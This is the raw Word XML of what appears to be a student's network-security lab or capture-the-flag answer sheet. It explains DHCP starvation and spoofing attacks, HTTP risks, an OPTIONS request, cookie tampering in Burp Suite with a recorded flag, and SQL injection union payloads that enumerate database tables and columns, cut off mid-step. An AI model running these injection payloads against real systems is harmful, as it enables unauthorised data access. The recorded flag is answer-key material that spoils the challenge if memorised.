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8BA4" w14:textId="3357ABCB" w:rsidR="007435E2" w:rsidRDefault="00044DB1" w:rsidP="00044DB1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45665E97" w14:textId="3E369356" w:rsidR="0082760D" w:rsidRDefault="0082760D" w:rsidP="0082760D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0082760D">
        <w:t>server discovery, IP lease offer, IP lease request, and IP lease acknowledgement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF183E" w14:textId="744DB5A9" w:rsidR="0082760D" w:rsidRDefault="0082760D" w:rsidP="0082760D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>: The four messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0082760D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="0082760D">
        <w:t xml:space="preserve"> broadcast on Layer 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F1A37" w14:textId="68C0E202" w:rsidR="00D34C6F" w:rsidRDefault="00D34C6F" w:rsidP="0082760D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00154BB8">
        <w:t>The discovery can be observed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190BC8AB" w14:textId="77777777" w:rsidR="00EF6211" w:rsidRDefault="0030387E" w:rsidP="0082760D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB497B" w14:textId="16CB8721" w:rsidR="0030387E" w:rsidRDefault="0030387E" w:rsidP="0082760D">
      <w:r w:rsidRPr="0030387E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Starvation attack</w:t>
      </w:r>
      <w:r>
        <w:t>: A</w:t>
      </w:r>
      <w:r w:rsidRPr="0030387E">
        <w:t>n attacker broadcasts large number of DHCP REQUEST messages with spoofed source MAC addresses</w:t>
      </w:r>
      <w:r w:rsidR="00EF6211">
        <w:t xml:space="preserve"> in order to</w:t>
      </w:r>
      <w:r w:rsidRPr="0030387E">
        <w:t xml:space="preserve"> deplete</w:t>
      </w:r>
      <w:r w:rsidR="00EF6211">
        <w:t xml:space="preserve"> the DHCP scope</w:t>
      </w:r>
      <w:r w:rsidRPr="0030387E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF3F31A" w14:textId="4730FEA6" w:rsidR="00EF6211" w:rsidRDefault="00EF6211" w:rsidP="0082760D">
      <w:r w:rsidRPr="00EF6211">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spoofing attack:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6211">
        <w:t>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF6211">
        <w:t xml:space="preserve">attacker set up a rogue DHCP server and </w:t>
      </w:r>
      <w:r w:rsidR="006715FF" w:rsidRPr="006715FF">
        <w:t>distribut</w:t>
      </w:r>
      <w:r w:rsidR="006715FF">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="006715FF" w:rsidRPr="006715FF">
        <w:t xml:space="preserve"> IP addresses and other TCP/IP configuration settings to the network DHCP clients</w:t>
      </w:r>
      <w:r w:rsidR="006715FF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D809F6" w14:textId="684D805A" w:rsidR="006715FF" w:rsidRDefault="006715FF" w:rsidP="006715FF">
      <w:r w:rsidRPr="006715FF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="006715FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ombination</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="006715FF">
        <w:t>Once the available number of IP Addresses is depleted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by Starvation attack</w:t>
      </w:r>
      <w:r w:rsidRPr="006715FF">
        <w:t>, network attackers can then set up</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Spoofing Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="006715FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="006715FF">
        <w:t xml:space="preserve"> respond to new DHCP requests from network DHCP clients. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0041DB1C" w14:textId="019C4C13" w:rsidR="006715FF" w:rsidRDefault="006715FF" w:rsidP="006715FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00EA4168">
        <w:t xml:space="preserve">An attacker would change the </w:t>
      </w:r>
      <w:r w:rsidR="00EA4168" w:rsidRPr="00EA4168">
        <w:t>Default Gateway IP Address</w:t>
      </w:r>
      <w:r w:rsidR="00EA4168">
        <w:t xml:space="preserve"> configuration to launch MITM attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641F1558" w14:textId="41DF34C8" w:rsidR="00EA4168" w:rsidRPr="006715FF" w:rsidRDefault="00EA4168" w:rsidP="006715FF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>: The DHCP snooping’s f</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4168">
        <w:t>unction is to block the illegal DHCP servers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on LAN switches</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4168">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA4168">
        <w:t>fter DHCP Snooping is enabled, clients in the network can only obtain IP addresses from DHCP servers specified by the administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA60BFC" w14:textId="590ACEBF" w:rsidR="006715FF" w:rsidRDefault="006715FF" w:rsidP="0082760D"/>
    <w:p w14:paraId="0EAA4843" w14:textId="77777777" w:rsidR="00CA3763" w:rsidRDefault="00CA3763" w:rsidP="0082760D"/>
    <w:p w14:paraId="23DF87E7" w14:textId="5E165238" w:rsidR="00EA4168" w:rsidRDefault="00EA4168" w:rsidP="00EA4168">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>02</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D1D77" w14:textId="450B3E11" w:rsidR="00EA4168" w:rsidRDefault="00C82361" w:rsidP="00EA4168">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: HTTPS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00C82361">
        <w:t>encrypted channel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00067B38">
        <w:t>to transfer data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B58E532" w14:textId="6C2A29F4" w:rsidR="00067B38" w:rsidRDefault="00067B38" w:rsidP="00EA4168">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>: B</w:t>
      </w:r>
      <w:r w:rsidRPr="00067B38">
        <w:t>ecause there is no encryption to protect the connection. Everything is sent over the connection in plain text, which means it's vulnerable to snooping and tampering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28986AAE" w14:textId="732135E3" w:rsidR="00067B38" w:rsidRDefault="00067B38" w:rsidP="00EA4168">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00046EA7">
        <w:t xml:space="preserve">The data between client and server might be </w:t>
      </w:r>
      <w:r w:rsidR="00444E5D">
        <w:t>intercepted by MITM attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D32C9" w14:textId="5FB1C157" w:rsidR="00444E5D" w:rsidRDefault="00444E5D" w:rsidP="00EA4168">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: In an open WIFI, a hacker can steal your bank and accommodation information, or </w:t>
      </w:r>
      <w:r w:rsidR="00522F10">
        <w:t>disguise</w:t>
      </w:r>
      <w:r w:rsidRPr="00444E5D">
        <w:t xml:space="preserve"> as someone chatting with you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41530265" w14:textId="7B20F909" w:rsidR="00522F10" w:rsidRDefault="00522F10" w:rsidP="00EA4168"/>
    <w:p w14:paraId="3AFEB8F8" w14:textId="77777777" w:rsidR="00CA3763" w:rsidRDefault="00CA3763" w:rsidP="00EA4168"/>
    <w:p w14:paraId="2988D18A" w14:textId="10A042F0" w:rsidR="00522F10" w:rsidRDefault="00522F10" w:rsidP="00522F10">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34A0D7" w14:textId="48AE966A" w:rsidR="00522F10" w:rsidRDefault="00583EC2" w:rsidP="00522F10">
      <w:r>
        <w:t>Step01: As the page showed, we are requested to use a different method, and the method should be OPTIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCD39D2" w14:textId="1B7B3F54" w:rsidR="00583EC2" w:rsidRDefault="00583EC2" w:rsidP="00522F10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tep02: All I can remember </w:t>
      </w:r>
      <w:r w:rsidR="00DE1B2C">
        <w:t>is that in HTTP request methods, there is a method called OPTIONs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623948DD" w14:textId="3B76310E" w:rsidR="00DE1B2C" w:rsidRDefault="00DE1B2C" w:rsidP="00522F10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tep03: Use curl to build </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OPTIONS HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3E0146" w14:textId="7F79C7A7" w:rsidR="00DE1B2C" w:rsidRDefault="00DE1B2C" w:rsidP="00522F10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC4CCC6" wp14:editId="2293142D">
            <wp:extent cx="5274310" cy="1562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528B" w14:textId="76BB3AD9" w:rsidR="00DE1B2C" w:rsidRDefault="00DE1B2C" w:rsidP="00522F10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Step04</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The response </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CD9DA2" w14:textId="064D8765" w:rsidR="00DE1B2C" w:rsidRDefault="00DE1B2C" w:rsidP="00522F10">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="141D32AA" wp14:editId="36661C04">
            <wp:extent cx="5274310" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175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DB2C" w14:textId="755B86C7" w:rsidR="00DE1B2C" w:rsidRDefault="00DE1B2C" w:rsidP="00522F10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>nswer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="582C514A" wp14:editId="61331DF7">
            <wp:extent cx="36068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F85" w14:textId="23C4E6E3" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00522F10"/>
    <w:p w14:paraId="53DA5CA5" w14:textId="77777777" w:rsidR="00CA3763" w:rsidRDefault="00CA3763" w:rsidP="00522F10"/>
    <w:p w14:paraId="738892C0" w14:textId="65675FF3" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D8E084" w14:textId="42219418" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>tep01: Access the page and click “Request Secret”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCFD01" w14:textId="77777777" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:r>
        <w:t>Step02: Burp Suite captures the POST message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B23D4" w14:textId="55E2B4A4" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46807312" wp14:editId="0B7D02D7">
            <wp:extent cx="5274310" cy="1181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8DCCE" w14:textId="080818E8" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="186B4941" wp14:editId="214CB769">
            <wp:extent cx="5274310" cy="2053590"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810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444A" w14:textId="77D4F8EB" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>tep03: Send the message to the repeater and modify Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405E4E13" w14:textId="57E72F37" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA8C774" wp14:editId="3E9792CA">
            <wp:extent cx="5274310" cy="2053590"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="6" name="图片 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文本, 应用程序, 电子邮件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95D7" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00573C6F"/>
    <w:p w14:paraId="2AD9314B" w14:textId="1724F4D0" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>tep04: Get a response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9A45C" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DAD5376" wp14:editId="4CD3AF2E">
            <wp:extent cx="5274310" cy="2967355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445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0B3708" w14:textId="001167D9" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00573C6F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: csf2021_{client-postbox-amid}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D2B9D" w14:textId="720E3872" w:rsidR="00573C6F" w:rsidRDefault="00573C6F" w:rsidP="00573C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26985AE3" w14:textId="77777777" w:rsidR="00CA3763" w:rsidRDefault="00CA3763" w:rsidP="00573C6F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2281F102" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E55A55" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B071A7C" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A5D5109" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28AF7616" w14:textId="7A8FD14C" w:rsidR="00573C6F" w:rsidRDefault="00CA3763" w:rsidP="00CA3763">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:t>05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C2914" w14:textId="24204C80" w:rsidR="0010459E" w:rsidRPr="00BE0B76" w:rsidRDefault="0010459E" w:rsidP="0010459E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Step0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5' union select table_name,</w:t>
      </w:r>
      <w:r w:rsidR="00BE0B76" w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1,2</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B3B94" w14:textId="543F0CF8" w:rsidR="0010459E" w:rsidRDefault="00BE0B76" w:rsidP="0010459E">
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0010459E">
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r>
        <w:t>obtain</w:t>
      </w:r>
      <w:r w:rsidR="0010459E">
        <w:t xml:space="preserve"> all tables in </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0010459E">
        <w:t xml:space="preserve">database, but </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">get an error about the number of columns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E15DFD" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="0010459E"/>
    <w:p w14:paraId="4B40DC19" w14:textId="12487B55" w:rsidR="004A3889" w:rsidRDefault="00BE0B76" w:rsidP="0010459E">
      <w:r>
        <w:t xml:space="preserve">Step02: </w:t>
      </w:r>
      <w:r w:rsidR="004A3889" w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5' union select table_name,</w:t>
      </w:r>
      <w:r w:rsidR="004A3889" w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1,2,3,4</w:t>
      </w:r>
      <w:r w:rsidR="004A3889" w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A3889" w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004A3889" w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004A3889" w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C644B5" w14:textId="01B033F7" w:rsidR="00BE0B76" w:rsidRPr="004A3889" w:rsidRDefault="00BE0B76" w:rsidP="0010459E">
      <w:r>
        <w:t xml:space="preserve">After tests, the number of columns is 5, so use </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35101C96" w14:textId="68FAACFE" w:rsidR="0010459E" w:rsidRDefault="0010459E" w:rsidP="00CA3763">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11DE5432" wp14:editId="4848400A">
            <wp:extent cx="3534508" cy="1566826"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="图片 8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表格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508" cy="15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8DAC" w14:textId="6306F3EC" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763"/>
    <w:p w14:paraId="1E182F25" w14:textId="77777777" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tep03: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC88911" w14:textId="3B0EC0FB" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Sathu"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">union select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, 1, 2, 3 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
